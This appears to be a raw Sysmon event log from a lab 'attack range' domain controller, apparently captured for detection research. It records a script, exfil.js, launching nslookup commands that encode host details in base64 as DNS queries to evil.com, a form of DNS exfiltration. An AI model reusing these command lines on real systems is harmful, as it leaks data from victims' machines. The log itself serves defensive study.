14:21:56.057{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216975Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.057{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216974Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.057{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216973Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.057{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216972Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.057{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1904-629A-E046-000000005F02}3536C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216971Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.057{2E1864BB-1904-629A-DE46-000000005F02}68886824C:\Windows\system32\cmd.exe{2E1864BB-1904-629A-E046-000000005F02}3536C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216970Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.068{2E1864BB-1904-629A-E046-000000005F02}3536C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-1904-629A-DE46-000000005F02}6888C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgprqd.tmp 2>&1 10341000x8000000000000000216969Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.042{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-1904-629A-DF46-000000005F02}5196C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216968Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.042{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-1904-629A-DF46-000000005F02}5196C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216967Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.042{2E1864BB-1904-629A-DF46-000000005F02}5196436C:\Windows\system32\conhost.exe{2E1864BB-1904-629A-DE46-000000005F02}6888C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216966Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.028{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1904-629A-DF46-000000005F02}5196C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216965Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.010{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216964Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.010{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216963Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.010{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216962Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.010{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216961Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.010{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1904-629A-DE46-000000005F02}6888C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216960Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.010{2E1864BB-18E0-629A-6742-000000005F02}39764040C:\Windows\System32\WScript.exe{2E1864BB-1904-629A-DE46-000000005F02}6888C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216959Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.024{2E1864BB-1904-629A-DE46-000000005F02}6888C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgprqd.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000216958Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.010{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlezgoh.tmpMD5=FA64F29A2105005DB944F49BBF99C790,SHA256=AFC24D0EC0C7AAB04F6CC9902001B05F5184E11791617287F2A4C4C94A76A48D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044927Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:56.815{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D9E9C2E7C0F7A057F31917387BE4BB8,SHA256=635E63CB501768D47A110B172DCA8BA3D91D8560F1B6C8652E4877BC81E4DCCA,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044926Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:54.241{0A5DF930-E35C-6299-1200-000000006002}1004C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruetruefe80:0:0:0:3804:9ed:f5ff:fef0win-host-ct-attack-range-726546dhcpv6-clienttrueff02:0:0:0:0:0:1:2-547dhcpv6-server 10341000x8000000000000000217686Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.990{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1905-629A-2447-000000005F02}4780C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217685Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.975{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217684Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.975{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217683Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.975{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217682Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.975{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217681Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.975{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1905-629A-2347-000000005F02}7952C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217680Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.975{2E1864BB-18E0-629A-6742-000000005F02}39767320C:\Windows\System32\WScript.exe{2E1864BB-1905-629A-2347-000000005F02}7952C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217679Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.986{2E1864BB-1905-629A-2347-000000005F02}7952C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A TUFDQWRkcmVzczogMDI6RjA6NEI6MUU6QUM6Q0E= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnlqgn.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000217678Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.975{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlhmlq.tmpMD5=1672107762ECEA7286E9D317B1D4872B,SHA256=4B917B4BC62A2EA4AC7C36E28B121764EAC51D071330300C02B5F6C0A7A1F19F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217677Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.334{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51495- 10341000x8000000000000000217676Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.959{2E1864BB-1905-629A-2147-000000005F02}61247888C:\Windows\system32\conhost.exe{2E1864BB-1905-629A-2247-000000005F02}6076C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217675Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.959{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 